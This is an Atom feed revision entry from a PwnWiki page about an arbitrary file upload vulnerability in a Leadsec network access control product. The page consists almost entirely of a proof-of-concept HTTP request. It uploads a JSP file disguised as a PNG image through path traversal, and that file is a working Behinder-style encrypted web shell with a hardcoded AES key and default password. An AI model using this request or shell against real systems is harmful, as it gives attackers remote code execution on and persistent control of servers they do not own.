https://pwnwiki.com/index.php?action=history&feed=atom&title=%E8%81%AF%E8%BB%9F%E5%87%86%E5%85%A5_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E 2026-04-21T05:41:00Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=%E8%81%AF%E8%BB%9F%E5%87%86%E5%85%A5_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&diff=1343&oldid=prev 2021-04-10T01:48:45Z

<p>Created page with &quot;==POC== &lt;pre&gt; POST /uai/download/uploadfileToPath.htm HTTP/1.1 HOST: xxxxx ... ... -----------------------------570xxxxxxxxx6025274xxxxxxxx1 Content-Disposition: form-data; n...&quot;</p> <p><b>New page</b></p><div>==POC==<br /> &lt;pre&gt;<br /> POST /uai/download/uploadfileToPath.htm HTTP/1.1<br /> HOST: xxxxx<br /> ... ...<br /> <br /> -----------------------------570xxxxxxxxx6025274xxxxxxxx1<br /> Content-Disposition: form-data; name=&quot;input_localfile&quot;; filename=&quot;xxx.jsp&quot;<br /> Content-Type: image/png<br /> <br /> &lt;%@page import=&quot;java.util.*,javax.crypto.*,javax.crypto.spec.*&quot;%&gt;&lt;%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%&gt;&lt;%if (request.getMethod().equals(&quot;POST&quot;)){String k=&quot;e45e329feb5d925b&quot;;/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue(&quot;u&quot;,k);Cipher c=Cipher.getInstance(&quot;AES&quot;);c.init(2,new SecretKeySpec(k.getBytes(),&quot;AES&quot;));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%&gt;<br /> <br /> -----------------------------570xxxxxxxxx6025274xxxxxxxx1<br /> Content-Disposition: form-data; name=&quot;uploadpath&quot;<br /> <br /> ../webapps/notifymsg/devreport/<br /> -----------------------------570xxxxxxxxx6025274xxxxxxxx1-- <br /> ​``` <br /> &lt;/pre&gt;</div>

Pwnwiki